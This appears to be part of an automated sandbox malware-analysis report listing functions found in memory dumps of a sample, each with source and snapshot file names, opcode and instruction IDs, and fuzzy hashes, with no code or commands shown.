                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: faa9e709972a613d861ffb37e7bf91d72cf7d7e49c758f55c0f505e41a735460
                                                                      • Instruction ID: 3d4970e368016df89d20ad34193b01346a0486f584f59d68dbb30e368e01ff49
                                                                      • Opcode Fuzzy Hash: faa9e709972a613d861ffb37e7bf91d72cf7d7e49c758f55c0f505e41a735460
                                                                      • Instruction Fuzzy Hash: A291E475A19A8D8FE799EF6888657A97FE1FF9A300F4000BED059C72D6DBB41805C701
                                                                      Function 00007FFD9B8BAC83 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C7
                                                                      • API String ID: 0-2279091541
                                                                      • Opcode ID: 65e3fdecc543b22f2e7a8671830d6624317275cb3677b1f51501ce598b81b6c6
                                                                      • Instruction ID: b4d2d4850ec423fea097f439b3cc2ca2995cfae3037106079f8fd9c886773f20
                                                                      • Opcode Fuzzy Hash: 65e3fdecc543b22f2e7a8671830d6624317275cb3677b1f51501ce598b81b6c6
                                                                      • Instruction Fuzzy Hash: AE21F661B1E95F6FE3A89B7848B567866C1EF9C300F5500B9D05DC31F7ED3879428A80
                                                                      Function 00007FFD9B8AA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8a3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: d3f910fb468791d0c2b66f784c224e512349c264c50413a61d04f45d7e95643d
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 4E118231A1CB588FDB64DF18844526AB7E1FB98711F16053ED489E3260CB34B901CB93
                                                                      Function 00007FFD9B8B1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: f2ddf0d11befb0bec007a1be58ba9323a3da8444ca8f48f3345ca36e76e6236f
                                                                      • Instruction ID: c8e4d33963be6dd8cbc8417ea5825987381a6f0d2dcd5ea021a28d42a78ee15a
                                                                      • Opcode Fuzzy Hash: f2ddf0d11befb0bec007a1be58ba9323a3da8444ca8f48f3345ca36e76e6236f
                                                                      • Instruction Fuzzy Hash: 1C11CE2190F3C54FDB53A73488289957FA0AF43711B0A81EFD0C9CF0B3EA69494ACB52
                                                                      Function 00007FFD9B8BA0C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 7f8ddfdf130aacf9b7476de586cdcd3b3aef73472bc7f4e99bd83cdc7b3bb3eb
                                                                      • Instruction ID: c7ffa4a1745523ea6cb93a08cdd3b3c601bd5da2b7c94cb969538111218a92b2
                                                                      • Opcode Fuzzy Hash: 7f8ddfdf130aacf9b7476de586cdcd3b3aef73472bc7f4e99bd83cdc7b3bb3eb
                                                                      • Instruction Fuzzy Hash: 72F0657150F7D44FDB169B3488698547F60EF6721174A52EFC085CF1A7EA2DD885C701
                                                                      Function 00007FFD9B8B1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 38ea68545302b9c01989b00e6b284007df05326a912b13332f72bccc1f1f478f
                                                                      • Instruction ID: 8753c3f5eb524fa91df1ec58b05c2539a94a4b96dce700be3113a47767918ab0
                                                                      • Opcode Fuzzy Hash: 38ea68545302b9c01989b00e6b284007df05326a912b13332f72bccc1f1f478f
                                                                      • Instruction Fuzzy Hash: 9AE0652160E3C04FCB16D7344468455BF60AE5720174A42EEC056CF1A3DA1D8845C741
                                                                      Function 00007FFD9B8BA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: b3c801c4e54e5f8a3b75842c697a3b861f2f6ea501a03c6c47cf0460f969df2c
                                                                      • Instruction ID: f9de5ab8aaf11e2697a201d7898a82829991c7104448e55076aea601bd8d6b86
                                                                      • Opcode Fuzzy Hash: b3c801c4e54e5f8a3b75842c697a3b861f2f6ea501a03c6c47cf0460f969df2c
                                                                      • Instruction Fuzzy Hash: 34E06D7164E7C44FCB1AEA748869454BFA0EF6721174A42EFC045CF1A3EA2DC889CB01
                                                                      Function 00007FFD9B8B2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: dbb7ebb9f8d96c5019915dc13f9c71ac12210b6a8e48ac8415c207d6ae606bc3
                                                                      • Instruction ID: ece0007347b9b621c31de2b26781e7ffdf66df55548ccd8b1245a96a66837df3
                                                                      • Opcode Fuzzy Hash: dbb7ebb9f8d96c5019915dc13f9c71ac12210b6a8e48ac8415c207d6ae606bc3
                                                                      • Instruction Fuzzy Hash: 95E06D6164E7C44FC71AEA798869454BFA0EF6720174A52EEC085CF1A7EA2D9889CB01
                                                                      Function 00007FFD9B8A57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8a3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 393eba9d9711a19b5506786fc4a65728e33f46a2fb3553964be39c89f452d0dc
                                                                      • Instruction ID: 6fe2936065e8a3f5d5f16c22c7508b20778d9e1fd425f340e12ee71d4400acbb
                                                                      • Opcode Fuzzy Hash: 393eba9d9711a19b5506786fc4a65728e33f46a2fb3553964be39c89f452d0dc
                                                                      • Instruction Fuzzy Hash: 10E0923060A3C54FCB16AB7488684547F70EF6720174A42EEC046CF1A3DB2DC886CB01
                                                                      Function 00007FFD9B8BA589 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 7ff4bafeb9aafd0be7ee9608fa9a5bf2fe8ac6683a48a36ad8f1ee9a15816e08
                                                                      • Instruction ID: f869f91c187899c3b9ea447e4c360f4f514973ec24e2290225685f6d2176d4fe
                                                                      • Opcode Fuzzy Hash: 7ff4bafeb9aafd0be7ee9608fa9a5bf2fe8ac6683a48a36ad8f1ee9a15816e08
                                                                      • Instruction Fuzzy Hash: 16E01A7154B3D44FCB16AB7488A58447FA0EE6B21078A41EEC085CF1B3E62D994ACB01
                                                                      Function 00007FFD9B8A9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8a3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 46f897e4a15e6a31e8d17efecb31edba84ea44df96699426ebfb6a9498234587
                                                                      • Instruction ID: 7e0f064c55896291f06ab9547fd7e9997f8b700c0e69d414af2f5a9d87f57863
                                                                      • Opcode Fuzzy Hash: 46f897e4a15e6a31e8d17efecb31edba84ea44df96699426ebfb6a9498234587
                                                                      • Instruction Fuzzy Hash: D4E0656154F3D04FCB0AAB74886980A3FB0AE6B20078A41EEC185CF1F3E629D849C711
                                                                      Function 00007FFD9B8B7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4a4fb6e631a2d06d1e65f71e011ca80d877973965aa21ed72ad8789ab4c880a6
                                                                      • Instruction ID: ca3bb9d0e1821532a47047d6c060e6291e4895d5b63f48f31a8dae5ff70aebe1
                                                                      • Opcode Fuzzy Hash: 4a4fb6e631a2d06d1e65f71e011ca80d877973965aa21ed72ad8789ab4c880a6
                                                                      • Instruction Fuzzy Hash: 5FE01A7054E3C04FCB0AAB7488698447F60AE6B21078B41DEC089CB1B3D62DC949C701
                                                                      Function 00007FFD9B8B1C79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: f810197a4ff932a30b10e461f48e3dfc7211ee5cc69bd8e0e95f1bc2c85c6caa
                                                                      • Instruction ID: 8a4499b413c84e63165560befb6dfee4e350d743693c73649c155e69e4c86b02
                                                                      • Opcode Fuzzy Hash: f810197a4ff932a30b10e461f48e3dfc7211ee5cc69bd8e0e95f1bc2c85c6caa
                                                                      • Instruction Fuzzy Hash: 42E01A6154E3C04FCB0AEB7884A99457F60AE6721078B41EEC04ACB1B3D62D8949C701
                                                                      Function 00007FFD9B8A91A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8a3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: a3efaa36a7bf8625f8119c05a2ee4e475913a9092caa5e3306918780daeaa072
                                                                      • Instruction ID: 7b50a8f57e4392f6c272152b2ff4df5f85ce4fc4ccb8bdde9c7bb4705140a620
                                                                      • Opcode Fuzzy Hash: a3efaa36a7bf8625f8119c05a2ee4e475913a9092caa5e3306918780daeaa072
                                                                      • Instruction Fuzzy Hash: D8E01A7054E3C04FCB0AAB7488698547F71AE6B21078B41DEC089CB1B3D62D8949CB01
                                                                      Function 00007FFD9B8A9391 Relevance: .3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8a3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af7439323e66984f660c69d3e4cfded0fc7f37ddced20f8223ea2dfa106aa147
                                                                      • Instruction ID: 17b387634b628f6c8a614ea76b8ada71940f87da1d17f212233088a190295c32
                                                                      • Opcode Fuzzy Hash: af7439323e66984f660c69d3e4cfded0fc7f37ddced20f8223ea2dfa106aa147
                                                                      • Instruction Fuzzy Hash: 4DA1B030B1890D8FDB58EF68C4A9AB977E2FF98314B1145BAD01EC72D6DF34A8428751
                                                                      Function 00007FFD9B8B32DD Relevance: .3, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 777ff9d3b4f049272da74078225c8113ab9320b8999a6680e044f247518597dc
                                                                      • Instruction ID: 8a3c290ea94bf9299ef0550400c110efb1478b2b6659c70e4de5de1ee5e496b3
                                                                      • Opcode Fuzzy Hash: 777ff9d3b4f049272da74078225c8113ab9320b8999a6680e044f247518597dc
                                                                      • Instruction Fuzzy Hash: 43811721B1D95E4FEBACEB68987667572D2FFAC300F0541BAD40DC31D7DD28A9464B80
                                                                      Function 00007FFD9B8B3365 Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5be6b03294cc05e1d22b0ca20ed9a5732e6d000d3605d4383f3000ad6e07a05
                                                                      • Instruction ID: 499f35ee0dbba996c3c41f61c5533ea9d92fd56861c7654ed97aef6949c46bb2
                                                                      • Opcode Fuzzy Hash: d5be6b03294cc05e1d22b0ca20ed9a5732e6d000d3605d4383f3000ad6e07a05
                                                                      • Instruction Fuzzy Hash: F951B321B1D95E4FEBACFB68947667972D2EF9C300F0541BAD40EC32D7ED28A9454B80
                                                                      Function 00007FFD9B8808E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                      • Instruction ID: dbef140c4aa4418e9ef87a0cae5e29ebf1933d7aeeba838eab54f1376e18cb09
                                                                      • Opcode Fuzzy Hash: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                      • Instruction Fuzzy Hash: 5A31043130D9194FD768EB5CE88A9B977D1EF8A32130541BBE48ACB166D921EC828781
                                                                      Function 00007FFD9B8B22A8 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72db7cf141921cb5918e829bbec157c5b00b9ec76348f36622759442fbdd50a5
                                                                      • Instruction ID: f342623aef978bc5484904508ec4e5b6be48c8f59734b0dd9a893eb10a6b65a8
                                                                      • Opcode Fuzzy Hash: 72db7cf141921cb5918e829bbec157c5b00b9ec76348f36622759442fbdd50a5
                                                                      • Instruction Fuzzy Hash: 13311832B0DA2D4FEB68EFA8D8656E97791EB99320F05027BD40DC72A5CD246D458BC0
                                                                      Function 00007FFD9B880998 Relevance: .1, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a4e70035cf209a60619d4915bf622533ab86a960a34593583dcf919599152b0
                                                                      • Instruction ID: 03516fa1a0f5dc682a55321ecce961ef4e3960198f5d560fa420f871287e4334
                                                                      • Opcode Fuzzy Hash: 3a4e70035cf209a60619d4915bf622533ab86a960a34593583dcf919599152b0
                                                                      • Instruction Fuzzy Hash: 94212820B1DD1D1FE758B76C586A679B6D2EB9D321F0504B9E81EC32F7EC34AC414281
                                                                      Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcba15c495825ebac8c8d47696d78b8a956bb9089773155b19f2b3a6eda9c953
                                                                      • Instruction ID: bcc0661ed4e576cbfc90838bd4e8e2e01ceba21587c2eed7fade4f6d14c76a6d
                                                                      • Opcode Fuzzy Hash: dcba15c495825ebac8c8d47696d78b8a956bb9089773155b19f2b3a6eda9c953
                                                                      • Instruction Fuzzy Hash: 16217C36B1DA5D8FE722ABA8AC210DC7B60EF85324F0545F3C058CB1D3D93826469390
                                                                      Function 00007FFD9B8BC998 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd1074c560be0ce6e3f0b2240dc89a152a45eb696486fa70f2a2349b2072d8c5
                                                                      • Instruction ID: a744cd715344430ef2f2140bd65c7456c6d29cae253c359e321c5887f75e4593
                                                                      • Opcode Fuzzy Hash: cd1074c560be0ce6e3f0b2240dc89a152a45eb696486fa70f2a2349b2072d8c5
                                                                      • Instruction Fuzzy Hash: F721C532F0452D9BFB64DA68D8543FE73A2EBD8310F014176D009D3299DE386E454BD0
                                                                      Function 00007FFD9B881B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 017d14c40ba880b0eee1840afbdc022076c034c6452677bd5af75aff0d9efb45
                                                                      • Instruction ID: 05914e670946050ee81f2e6267dc390faa3d39f80fbda2ebd62762426450c166
                                                                      • Opcode Fuzzy Hash: 017d14c40ba880b0eee1840afbdc022076c034c6452677bd5af75aff0d9efb45
                                                                      • Instruction Fuzzy Hash: B0213221F1ED0E4BEBB4F76884646B86292EF8C711F5602B5D42DD72F2ED38AE418740
                                                                      Function 00007FFD9B8946A4 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 540c6f15be81c940882db62d712557e0c88824350acb9d04d007df7f32565668
                                                                      • Instruction ID: 1bd93a518c9a847fd28bf47c5a754b2487e50cb10cac607c46494092c1013a3b
                                                                      • Opcode Fuzzy Hash: 540c6f15be81c940882db62d712557e0c88824350acb9d04d007df7f32565668
                                                                      • Instruction Fuzzy Hash: 2D112931A0D61D4FEB75DF54D8506AB7BA1EB8A310F0241BFD44AC31A6DE34590687D0
                                                                      Function 00007FFD9B8810BD Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f36f703089d7a900b13719d33bb44a0f0ee7f6d6efd6c87431c27fe279f17aa
                                                                      • Instruction ID: 8e3d850c7e3077907522cf053cf9abd1785c753fb10cc111302bf3a57e3d98eb
                                                                      • Opcode Fuzzy Hash: 6f36f703089d7a900b13719d33bb44a0f0ee7f6d6efd6c87431c27fe279f17aa
                                                                      • Instruction Fuzzy Hash: 70014E11A8FAC50FD72A57B45C719A13FE0DF8B21030A01FAD095CB1F3CC5D19868351
                                                                      Function 00007FFD9B894668 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13a4c5b473312410354a4c9e7472aed318358f79670a516c8024b959865bc412
                                                                      • Instruction ID: d3637fbb5efeb18aa860594cb9e25ee4bc94ef5e12d9d62f67c2f117a025bc85
                                                                      • Opcode Fuzzy Hash: 13a4c5b473312410354a4c9e7472aed318358f79670a516c8024b959865bc412
                                                                      • Instruction Fuzzy Hash: 4F016D52A4F6CA0FEB27476488755A93F719F9725471E41FBC099CA0E3E90C6A06C312
                                                                      Function 00007FFD9B880C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c642151ab11ae08a5717c81b0405263ec29e37f5b7e792c817e4fe5494642e2
                                                                      • Instruction ID: 952056a0aa3764fd3f56f86130b57d17c7fad738b239d96311f2e2b2ce5e5442
                                                                      • Opcode Fuzzy Hash: 2c642151ab11ae08a5717c81b0405263ec29e37f5b7e792c817e4fe5494642e2
                                                                      • Instruction Fuzzy Hash: 3111A535F1EA8D8FE722DFA8886019C7FB1EF55710F0645F7C054DB1A2D5386A458790
                                                                      Function 00007FFD9B880C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c77c1687d904b5fae99166bbff50c91c696ddf698f05ce4a943c47ee42a48104
                                                                      • Instruction ID: 20537b31873c010fa2df9e4d518df9aaa41042acb7ae299d6e310d7adaad8902
                                                                      • Opcode Fuzzy Hash: c77c1687d904b5fae99166bbff50c91c696ddf698f05ce4a943c47ee42a48104
                                                                      • Instruction Fuzzy Hash: 55018035E1EA8D8FE726DFA8886019C7FB1EF46710F1641F7D054DB2A2D9386A458780
